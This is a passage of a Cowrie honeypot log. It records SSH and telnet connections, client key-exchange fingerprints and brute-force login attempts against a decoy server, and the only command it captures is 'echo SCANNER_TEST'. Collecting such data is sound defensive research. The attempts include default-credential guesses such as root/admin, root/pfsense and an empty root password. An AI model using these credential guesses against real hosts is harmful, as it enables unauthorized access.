sh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T19:40:54.303780Z","src_ip":"147.45.65.11","session":"a691a5839392"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:40:54.416513Z","src_ip":"147.45.65.11","session":"a691a5839392"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:40:54.435729Z","src_ip":"147.45.65.11","session":"ec0c010865d7"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:40:54.436659Z","src_ip":"147.45.65.11","session":"a691a5839392"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45278,"dst_ip":"1.2.3.4","dst_port":23,"session":"b2e795834461","protocol":"telnet","message":"New connection: 212.227.235.229:45278 (1.2.3.4:23) [session: b2e795834461]","sensor":"my-vps","timestamp":"2025-08-28T19:41:09.923877Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:41:10.127354Z","src_ip":"212.227.235.229","session":"b2e795834461"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T19:41:10.148089Z","src_ip":"212.227.235.229","session":"b2e795834461"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.148.28","src_port":50810,"dst_ip":"1.2.3.4","dst_port":23,"session":"433652722a74","protocol":"telnet","message":"New connection: 176.65.148.28:50810 (1.2.3.4:23) [session: 433652722a74]","sensor":"my-vps","timestamp":"2025-08-28T19:41:10.149714Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:41:10.189919Z","src_ip":"176.65.148.28","session":"433652722a74"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T19:41:10.207454Z","src_ip":"176.65.148.28","session":"433652722a74"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63518,"dst_ip":"1.2.3.4","dst_port":22,"session":"de0794aac415","protocol":"ssh","message":"New connection: 217.72.205.35:63518 (1.2.3.4:22) [session: de0794aac415]","sensor":"my-vps","timestamp":"2025-08-28T19:41:55.468235Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:41:55.469374Z","src_ip":"217.72.205.35","session":"de0794aac415"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43412,"dst_ip":"1.2.3.4","dst_port":22,"session":"14df48d69053","protocol":"ssh","message":"New connection: 212.227.235.229:43412 (1.2.3.4:22) [session: 14df48d69053]","sensor":"my-vps","timestamp":"2025-08-28T19:42:31.793457Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T19:42:31.794322Z","src_ip":"212.227.235.229","session":"14df48d69053"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T19:42:31.901031Z","src_ip":"212.227.235.229","session":"14df48d69053"}
{"eventid":"cowrie.login.failed","username":"webadmin","password":"webadmin","message":"login attempt [webadmin/webadmin] failed","sensor":"my-vps","timestamp":"2025-08-28T19:42:32.199163Z","src_ip":"212.227.235.229","session":"14df48d69053"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:42:33.300332Z","src_ip":"212.227.235.229","session":"14df48d69053"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:44:10.164003Z","src_ip":"212.227.235.229","session":"b2e795834461"}
{"eventid":"cowrie.session.closed","duration":180.2448124885559,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:44:10.168595Z","src_ip":"212.227.235.229","session":"b2e795834461"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:44:10.207798Z","src_ip":"176.65.148.28","session":"433652722a74"}
{"eventid":"cowrie.session.closed","duration":180.06195974349976,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:44:10.211606Z","src_ip":"176.65.148.28","session":"433652722a74"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52334,"dst_ip":"1.2.3.4","dst_port":22,"session":"31b9b72122f7","protocol":"ssh","message":"New connection: 212.227.125.160:52334 (1.2.3.4:22) [session: 31b9b72122f7]","sensor":"my-vps","timestamp":"2025-08-28T19:45:13.937925Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T19:45:13.949053Z","src_ip":"212.227.125.160","session":"31b9b72122f7"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T19:45:13.995065Z","src_ip":"212.227.125.160","session":"31b9b72122f7"}
{"eventid":"cowrie.login.success","username":"root","password":"pfsense","message":"login attempt [root/pfsense] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:45:14.163048Z","src_ip":"212.227.125.160","session":"31b9b72122f7"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:45:14.237887Z","src_ip":"212.227.125.160","session":"31b9b72122f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43516,"dst_ip":"1.2.3.4","dst_port":22,"session":"a57f014a6030","protocol":"ssh","message":"New connection: 212.227.235.229:43516 (1.2.3.4:22) [session: a57f014a6030]","sensor":"my-vps","timestamp":"2025-08-28T19:45:14.518752Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T19:45:14.519334Z","src_ip":"212.227.235.229","session":"a57f014a6030"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T19:45:14.624083Z","src_ip":"212.227.235.229","session":"a57f014a6030"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"ea:08:9a:e6:5b:22:04:f9:d7:0a:ae:f2:3e:61:ea:f5","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDW7bXyg1qQpzOijaWpT4imh4D+QDKShGZC9kfFky7MUxoTbyVFCSQ/+GMCCTYUCrLMG0852BT7EloDtDArsS5ZlLB2Q7d0W7gIlruI8DcC16mjo3+fHlydYrPuf/0abkps3R2moIbCtK7iwESSida4WZ6ceEri+4av1fyovfJsCvqzFZtvmNYmoggOViSmcId2F5sq9yZkcqkVt0tIE6KMvlFev8Cy2/JBLhy9brR0OygiNZgo/CovwsV949zXkJlV3cUqIjnBn+IS2bLKe9ncOsSP85cY+adaSchhb66Lej+sfNTIJQOo1nyXyvWSmGne4vnVeKQDewA6T3LjaRMRu5ZAaZaajawcPoyhJT1B8BIzC/+kwgPd2Mnl7Ppx5vBaCpBCMCEjo+eOXfkI8YdIZG67T4aD0bKOumGsYtDi4gRrKL2H8UV47A+adK7pjvxh9IvpXIq3Fo+SPaFDY3NugaGAQQXsSjWb0H5MLKS4x0C1vEnvaQ42tQ503pbi3RM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint ea:08:9a:e6:5b:22:04:f9:d7:0a:ae:f2:3e:61:ea:f5","sensor":"my-vps","timestamp":"2025-08-28T19:45:14.835465Z","src_ip":"212.227.235.229","session":"a57f014a6030"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"ea:08:9a:e6:5b:22:04:f9:d7:0a:ae:f2:3e:61:ea:f5","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDW7bXyg1qQpzOijaWpT4imh4D+QDKShGZC9kfFky7MUxoTbyVFCSQ/+GMCCTYUCrLMG0852BT7EloDtDArsS5ZlLB2Q7d0W7gIlruI8DcC16mjo3+fHlydYrPuf/0abkps3R2moIbCtK7iwESSida4WZ6ceEri+4av1fyovfJsCvqzFZtvmNYmoggOViSmcId2F5sq9yZkcqkVt0tIE6KMvlFev8Cy2/JBLhy9brR0OygiNZgo/CovwsV949zXkJlV3cUqIjnBn+IS2bLKe9ncOsSP85cY+adaSchhb66Lej+sfNTIJQOo1nyXyvWSmGne4vnVeKQDewA6T3LjaRMRu5ZAaZaajawcPoyhJT1B8BIzC/+kwgPd2Mnl7Ppx5vBaCpBCMCEjo+eOXfkI8YdIZG67T4aD0bKOumGsYtDi4gRrKL2H8UV47A+adK7pjvxh9IvpXIq3Fo+SPaFDY3NugaGAQQXsSjWb0H5MLKS4x0C1vEnvaQ42tQ503pbi3RM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T19:45:14.836107Z","src_ip":"212.227.235.229","session":"a57f014a6030"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"ea:08:9a:e6:5b:22:04:f9:d7:0a:ae:f2:3e:61:ea:f5","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDW7bXyg1qQpzOijaWpT4imh4D+QDKShGZC9kfFky7MUxoTbyVFCSQ/+GMCCTYUCrLMG0852BT7EloDtDArsS5ZlLB2Q7d0W7gIlruI8DcC16mjo3+fHlydYrPuf/0abkps3R2moIbCtK7iwESSida4WZ6ceEri+4av1fyovfJsCvqzFZtvmNYmoggOViSmcId2F5sq9yZkcqkVt0tIE6KMvlFev8Cy2/JBLhy9brR0OygiNZgo/CovwsV949zXkJlV3cUqIjnBn+IS2bLKe9ncOsSP85cY+adaSchhb66Lej+sfNTIJQOo1nyXyvWSmGne4vnVeKQDewA6T3LjaRMRu5ZAaZaajawcPoyhJT1B8BIzC/+kwgPd2Mnl7Ppx5vBaCpBCMCEjo+eOXfkI8YdIZG67T4aD0bKOumGsYtDi4gRrKL2H8UV47A+adK7pjvxh9IvpXIq3Fo+SPaFDY3NugaGAQQXsSjWb0H5MLKS4x0C1vEnvaQ42tQ503pbi3RM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint ea:08:9a:e6:5b:22:04:f9:d7:0a:ae:f2:3e:61:ea:f5","sensor":"my-vps","timestamp":"2025-08-28T19:45:14.942010Z","src_ip":"212.227.235.229","session":"a57f014a6030"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"ea:08:9a:e6:5b:22:04:f9:d7:0a:ae:f2:3e:61:ea:f5","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDW7bXyg1qQpzOijaWpT4imh4D+QDKShGZC9kfFky7MUxoTbyVFCSQ/+GMCCTYUCrLMG0852BT7EloDtDArsS5ZlLB2Q7d0W7gIlruI8DcC16mjo3+fHlydYrPuf/0abkps3R2moIbCtK7iwESSida4WZ6ceEri+4av1fyovfJsCvqzFZtvmNYmoggOViSmcId2F5sq9yZkcqkVt0tIE6KMvlFev8Cy2/JBLhy9brR0OygiNZgo/CovwsV949zXkJlV3cUqIjnBn+IS2bLKe9ncOsSP85cY+adaSchhb66Lej+sfNTIJQOo1nyXyvWSmGne4vnVeKQDewA6T3LjaRMRu5ZAaZaajawcPoyhJT1B8BIzC/+kwgPd2Mnl7Ppx5vBaCpBCMCEjo+eOXfkI8YdIZG67T4aD0bKOumGsYtDi4gRrKL2H8UV47A+adK7pjvxh9IvpXIq3Fo+SPaFDY3NugaGAQQXsSjWb0H5MLKS4x0C1vEnvaQ42tQ503pbi3RM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T19:45:14.942652Z","src_ip":"212.227.235.229","session":"a57f014a6030"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54984,"dst_ip":"1.2.3.4","dst_port":23,"session":"7a774d05f473","protocol":"telnet","message":"New connection: 212.227.125.160:54984 (1.2.3.4:23) [session: 7a774d05f473]","sensor":"my-vps","timestamp":"2025-08-28T19:45:20.128241Z"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:45:24.517617Z","src_ip":"212.227.235.229","session":"a57f014a6030"}
{"eventid":"cowrie.session.closed","duration":31.3751699924469,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:45:51.503344Z","src_ip":"212.227.125.160","session":"7a774d05f473"}
{"eventid":"cowrie.session.connect","src_ip":"123.21.176.85","src_port":60863,"dst_ip":"1.2.3.4","dst_port":23,"session":"312389e0fc0f","protocol":"telnet","message":"New connection: 123.21.176.85:60863 (1.2.3.4:23) [session: 312389e0fc0f]","sensor":"my-vps","timestamp":"2025-08-28T19:46:50.238109Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40160,"dst_ip":"1.2.3.4","dst_port":23,"session":"c28d7bd1cc16","protocol":"telnet","message":"New connection: 212.227.125.160:40160 (1.2.3.4:23) [session: c28d7bd1cc16]","sensor":"my-vps","timestamp":"2025-08-28T19:46:59.522726Z"}
{"eventid":"cowrie.session.closed","duration":13.684330940246582,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:47:03.922368Z","src_ip":"123.21.176.85","session":"312389e0fc0f"}
{"eventid":"cowrie.session.closed","duration":16.027149438858032,"message":"Connection lost after 16 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:47:15.549767Z","src_ip":"212.227.125.160","session":"c28d7bd1cc16"}
{"eventid":"cowrie.session.connect","src_ip":"14.54.168.44","src_port":38087,"dst_ip":"1.2.3.4","dst_port":23,"session":"7b55b6d84f56","protocol":"telnet","message":"New connection: 14.54.168.44:38087 (1.2.3.4:23) [session: 7b55b6d84f56]","sensor":"my-vps","timestamp":"2025-08-28T19:47:32.711921Z"}
{"eventid":"cowrie.session.connect","src_ip":"81.133.74.130","src_port":43925,"dst_ip":"1.2.3.4","dst_port":23,"session":"43270ee1b972","protocol":"telnet","message":"New connection: 81.133.74.130:43925 (1.2.3.4:23) [session: 43270ee1b972]","sensor":"my-vps","timestamp":"2025-08-28T19:47:42.837682Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":62028,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce6e4611590f","protocol":"ssh","message":"New connection: 212.227.125.160:62028 (1.2.3.4:22) [session: ce6e4611590f]","sensor":"my-vps","timestamp":"2025-08-28T19:47:49.985444Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T19:47:50.005112Z","src_ip":"212.227.125.160","session":"ce6e4611590f"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T19:47:50.090302Z","src_ip":"212.227.125.160","session":"ce6e4611590f"}
{"eventid":"cowrie.login.failed","username":"bennett","password":"bennett","message":"login attempt [bennett/bennett] failed","sensor":"my-vps","timestamp":"2025-08-28T19:47:50.492367Z","src_ip":"212.227.125.160","session":"ce6e4611590f"}
{"eventid":"cowrie.login.failed","username":"bennett","password":"bennett1","message":"login attempt [bennett/bennett1] failed","sensor":"my-vps","timestamp":"2025-08-28T19:47:51.580438Z","src_ip":"212.227.125.160","session":"ce6e4611590f"}
{"eventid":"cowrie.login.failed","username":"bennett","password":"bennett123","message":"login attempt [bennett/bennett123] failed","sensor":"my-vps","timestamp":"2025-08-28T19:47:52.669025Z","src_ip":"212.227.125.160","session":"ce6e4611590f"}
{"eventid":"cowrie.login.failed","username":"bennett","password":"bennett1234","message":"login attempt [bennett/bennett1234] failed","sensor":"my-vps","timestamp":"2025-08-28T19:47:53.755717Z","src_ip":"212.227.125.160","session":"ce6e4611590f"}
{"eventid":"cowrie.login.failed","username":"bennett","password":"bennett12345","message":"login attempt [bennett/bennett12345] failed","sensor":"my-vps","timestamp":"2025-08-28T19:47:54.852120Z","src_ip":"212.227.125.160","session":"ce6e4611590f"}
{"eventid":"cowrie.session.closed","duration":12.63193416595459,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:47:55.469551Z","src_ip":"81.133.74.130","session":"43270ee1b972"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:47:55.946044Z","src_ip":"212.227.125.160","session":"ce6e4611590f"}
{"eventid":"cowrie.session.closed","duration":31.529727458953857,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:48:04.241582Z","src_ip":"14.54.168.44","session":"7b55b6d84f56"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58698,"dst_ip":"1.2.3.4","dst_port":22,"session":"4359a1094777","protocol":"ssh","message":"New connection: 217.72.205.35:58698 (1.2.3.4:22) [session: 4359a1094777]","sensor":"my-vps","timestamp":"2025-08-28T19:48:38.006773Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:48:38.007993Z","src_ip":"217.72.205.35","session":"4359a1094777"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47610,"dst_ip":"1.2.3.4","dst_port":23,"session":"fdb3ab9a36ec","protocol":"telnet","message":"New connection: 212.227.235.229:47610 (1.2.3.4:23) [session: fdb3ab9a36ec]","sensor":"my-vps","timestamp":"2025-08-28T19:48:44.912380Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T19:48:47.636396Z","src_ip":"212.227.235.229","session":"fdb3ab9a36ec"}
{"eventid":"cowrie.session.closed","duration":5.073943376541138,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:48:49.986254Z","src_ip":"212.227.235.229","session":"fdb3ab9a36ec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44206,"dst_ip":"1.2.3.4","dst_port":23,"session":"70d4f9e43ff7","protocol":"telnet","message":"New connection: 212.227.235.229:44206 (1.2.3.4:23) [session: 70d4f9e43ff7]","sensor":"my-vps","timestamp":"2025-08-28T19:48:50.202171Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:48:51.493047Z","src_ip":"212.227.235.229","session":"70d4f9e43ff7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T19:48:51.513084Z","src_ip":"212.227.235.229","session":"70d4f9e43ff7"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T19:48:52.163894Z","src_ip":"212.227.235.229","session":"70d4f9e43ff7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.8","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:48:53.273636Z","src_ip":"212.227.235.229","session":"70d4f9e43ff7"}
{"eventid":"cowrie.session.closed","duration":3.0765326023101807,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:48:53.278598Z","src_ip":"212.227.235.229","session":"70d4f9e43ff7"}
